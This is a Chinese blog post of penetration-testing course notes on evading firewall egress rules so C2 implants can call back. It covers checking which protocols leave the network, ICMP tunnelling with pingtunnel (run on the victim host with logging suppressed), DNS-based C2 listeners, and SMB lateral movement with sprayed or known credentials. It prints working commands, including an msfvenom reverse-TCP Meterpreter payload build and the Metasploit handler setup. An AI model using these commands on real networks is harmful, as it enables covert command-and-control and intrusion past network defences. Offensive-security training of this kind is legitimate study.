当前位置: 首页 > news >正文

173天隧道技术篇防火墙组策略ICMPDNSSMB协议出网判断C2上线解决方案

主要学习的是icmp隧道的搭建

分别的C2的icmp隧道搭建和msf隧道搭建
以及要了解C2支持的各种协议
如何判断主机支持什么协议

Icmp  使用ping ip or domain
Ssh 用ssh连接  ip or domain
Dns 用 nslookup  domain
Http 用 curl ip
tcp用  telnet ip orport

icmp隧道搭建使用工具

使用pingtunnel工具进行搭建隧道 https://github.com/esrrhs/pingtunnel
使用参考文章:https://www.freebuf.com/articles/network/282244.html

# windows操作系统【不太好使】
pingtunnel.exe -type client -l :监听本机的端口(随便写) -s pingtunnel服务端地址 -t 隧道目标地址:端口 -tcp 1
# windows操作系统【不太好使】
./pingtunnel -type client -l :监听本机的端口(随便写) -s pingtunnel服务端地址 -t 隧道目标地址:端口 -tcp 1

监听器与后门的配置
第一条命令是在pingtunnel服务端上运行的,第二条是在客户端上运行的,也就是说得把pingtunnel上传到被攻击的主机上去 注意点是 需要一点要加上 noprint nolog
image

DNS

如果是使用C2搭建DNS隧道,这边是不需要搭建的,因为C2自身支持生成DNS的payload
分别支持
image
需要创建三个域名
image
创建监听器的时候加上
image

可以使用checkin 和 mode dns-txt 加快dns进程
image

MSF搭建icmp隧道

仍然是使用pingtunnel

服务端
./pingtunnel -type server  
客户端
pingtunnel -type client -l :3333 -s 192.168.139.141 -t 192.168.139.141:3344 -tcp 1 -noprint 1 -nolog 1 

生成木马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=3333 -f exe -o msf.exe

MSF监听器配置

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 3344
run

SMB横向移动

445端口开放代表SMB协议开放
适用场景:防火墙放行的WEB入口打不下来利用放行的SMB移动获取权限
利用条件:密码喷射或已知口令的情况下直接正向SMB横向移动拿下
注意是先通过信息收集到账号密码,然后进行端口扫描发现开放smb 最后进行横向移动
image

http://www.rkmt.cn/news/30756.html

相关文章:

  • 实用指南:3DGS 如何理解它?
  • 面试总被追问k8s调度器工作原理, 收藏 == 学废
  • 题解:十二重计数法
  • 2025 年 10 月厨房排烟、厨房排烟罩、厨房排烟系统厂家最新推荐,资质、案例、售后三维测评与选购指南
  • # Ubuntu 根目录空间扩展操作手册(基于 RAID 关联磁盘 /dev/sdb2)
  • Perplexity Comet AI浏览器「等待网络链接」解决方案
  • 新地球
  • 实用指南:Android 常见界面布局详解
  • 2025 年 10 月食堂厨房设备厂家最新推荐,聚焦资质、案例、售后的食堂场景深度解读
  • 基于深度学习神经网络协同过滤模型(NCF)的视频推荐体系
  • 给安卓设置背景色的时候保持默认按钮样式(关于使用setBackgroundColor导致丢失默认按钮样式的问题)
  • 分片上传与断点续传实现详解
  • Kanass入门到实战(6) - 如何进行缺陷管理 - 指南
  • 数据处理方法汇总
  • 2025 年 10 月展示柜厂家最新推荐,技术实力与市场口碑深度解析!
  • 2025年10月益生菌品牌推荐榜:全维度对比与榜单解读
  • 2025年10月美容仪品牌推荐:无创无痛对比评测榜
  • 2025年10月中国遗产继承律师推荐榜:五强对比全解析
  • php特性
  • 2025年10月深圳近视手术医生推荐榜:五强对比与口碑评价
  • php_sha1函数特性
  • php非法参数
  • php原生类的使用
  • 2025 年 10 月仿石漆厂家最新推荐,精准检测与稳定性能深度解析
  • 下午选歌
  • 分治算法在查找第k小元素中的应用与分析
  • 2025年10月中国装饰公司对比榜:十家口碑与实力排行
  • 2025年10月电竞显示器品牌评价榜:五强对比与选购要点
  • 2025年10月食品展会推荐榜:NHNE领衔五大展会对比评测
  • 2025年10月连锁酒店排行榜推荐:丽柏丽怡领衔对比评测榜